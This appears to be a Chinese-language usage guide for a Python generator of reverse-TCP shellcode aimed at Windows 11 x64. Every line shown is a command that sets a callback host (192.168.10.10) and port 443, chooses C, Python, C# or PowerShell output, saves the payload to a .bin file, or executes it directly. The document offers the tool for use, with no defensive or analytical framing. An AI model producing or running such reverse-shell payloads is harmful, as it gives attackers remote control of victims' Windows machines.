
适用于 Windows >= 11 x64 的 Shellcode
python ./shell_reverse_tcp.py -i 192.168.10.10 -p 443
默认语言为 C 类型 shellcode,也支持 Python、Csharp 和 powershell:
python ./shell_reverse_tcp.py -i 192.168.10.10 -p 443 --language powershell
保存文件:
python ./shell_reverse_tcp.py -i 192.168.10.10 -p 443 --save true
默认输出为 output.bin:
python ./shell_reverse_tcp.py -i 192.168.10.10 -p 443 --save true --output shellcode.bin
测试与执行:
python ./shell_reverse_tcp.py -i 192.168.10.10 -p 443 -execution true
以及:
python ./shell_reverse_tcp.py -i 192.168.10.10 -p 443 -execution true --language powershell --save true --output shellcode.bin